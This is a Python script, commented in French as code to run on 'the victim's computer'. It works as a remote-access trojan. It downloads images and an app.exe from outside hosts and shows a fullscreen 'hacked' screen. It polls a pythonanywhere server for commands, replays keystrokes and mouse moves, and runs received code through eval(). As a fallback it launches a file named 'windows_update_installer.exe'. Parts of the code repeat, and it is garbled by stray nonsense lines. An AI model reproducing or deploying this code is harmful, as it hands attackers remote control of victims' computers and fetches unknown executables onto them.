# le code qui va être exécuté sur l’ordinateur de la victime, stocké sur le serveur django

import webbrowser

import time

import os

#webbrowser.open('https://www.coupcritique.fr/entity/actualities')

def malware():

import pyautogui

import pygame.image

import urllib.request

import os

screen\_size = pyautogui.size()

imgURL = rf"http://pythonanywherean.pythonanywhere.com/static/Battle/images/hacked1.png"

urllib.request.urlretrieve(imgURL, rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")

imgURL2 = rf"http://pythonanywherean.pythonanywhere.com/static/Battle/images/hacked2.png"

urllib.request.urlretrieve(imgURL2, rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")

img1 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")

img1 = pygame.transform.rotozoom(img1, 0, screen\_size[0]/img1.get\_size()[0])

img2 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")

img2 = pygame.transform.rotozoom(img2, 0, screen\_size[0]/img1.get\_size()[0]/2)

win = pygame.display.set\_mode((0, 0), pygame.FULLSCREEN) # set window size

pygame.display.set\_caption("Hacker") # title of the screen

pygame.init() # initializes pygame

# the function that will update the screen every frame

def aff(win):

win.fill((0, 0, 0)) # fills the screen with black

win.blit(img1, (0, 0)) #item[2] is the loaded image of this item

if time.time()-time\_AA>5:

win.blit(img2, (50, 50))

pygame.display.update() # finally you need this line to update the display

data = ""

time\_AA = time.time()

while not("reload" in data):

keys = pygame.key.get\_pressed() # gets all pressed keys

aff (win) # updates the screen

# I don't know why but you have to write the following lines otherwise the code won't work

for event in pygame.event.get():

if event.type == pygame.QUIT:

run = False

pygame.quit()

data = get\_data(f"http://pythonanywherean.pythonanywhere.com/RecvData/")

time.sleep(0.01) # to slow down the main loop (not really needed)

malware()

import requests

URL = "https://my.parallels.com/action/access/download/EME4UFoPDx"

response = requests.get(URL)

open(rf"C:\Users\{os.getlogin()}\Documents\app.exe", "wb").write(response.content)

is\_connected = " "

def get\_data(webpage):

url = webpage

req = requests.get(url, 'html.parser')

return req.text

get\_data("https://my.parallels.com/action/access/download/EME4UFoPDx")

mode\_for = 0

liste = ""

screen\_size = pyautogui.size()

def malware():

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import urllib.request

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urllib.request.urlretrieve(imgURL2, rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")

img1 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")

img1 = pygame.transform.rotozoom(img1, 0, screen\_size[0]/img1.get\_size()[0])

img2 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")

img2 = pygame.transform.rotozoom(img2, 0, screen\_size[0]/img1.get\_size()[0]/2)

print(4)

win = pygame.display.set\_mode((0, 0), pygame.FULLSCREEN) # set window size

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run = False

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time.sleep(0.01) # to slow down the main loop (not really needed)

print()

try:

with open(rf"C:\Users\{os.getlogin()}\Documents\OfflineMode.txt", "w+") as f:

f.write(data)

print("Ready for hacking, connected to servor")

while 1:

time.sleep(1)

get\_data("http://pythonanywherean.pythonanywhere.com/Connected/")

data = get\_data(f"http://pythonanywherean.pythonanywhere.com/RecvData/")

get\_data("http://pythonanywherean.pythonanywhere.com/DeleteData/")

if "$reload$" in data:

print("found")

azeazeazeazeazeaeza

for el in range(len(data)):

if mode\_for==0:

if data[el]=="$" or data[el]=="ù":

mode\_for = 1

else:

pyautogui.write(data[el])

else:

if data[el] == "$" or data[el] == "ù":

mode\_for = 0

if data[el] == "$":

print(liste)

if liste == "win":

pyautogui.press("win")

elif liste == "enter":

pyautogui.press("enter")

elif liste == "reload":

azeazeazeazeazeaeza

elif liste.startswith("rm"):

pyautogui.press("backspace", presses=int(liste[2]))

elif liste.startswith("move"):

liste = liste.split(".")

pyautogui.moveTo(int(liste[1])\*screen\_size[0]/100, int(liste[2])\*screen\_size[1]/100)

elif liste.startswith("malware"):

#start\_new\_thread(malware, ())

malware()

azeazeazeazeazeaeza

elif liste.startswith('\*'):

liste = liste.split(".")

if len(liste)==2:

pyautogui.press(liste[0][1:], presses=int(liste[1]))

else:

pyautogui.press(liste[0][1:], presses=1)

else:

print("executing script")

eval(liste)

liste = ""

else:

liste += data[el]

except:

os.startfile("windows\_update\_installer.exe")

"""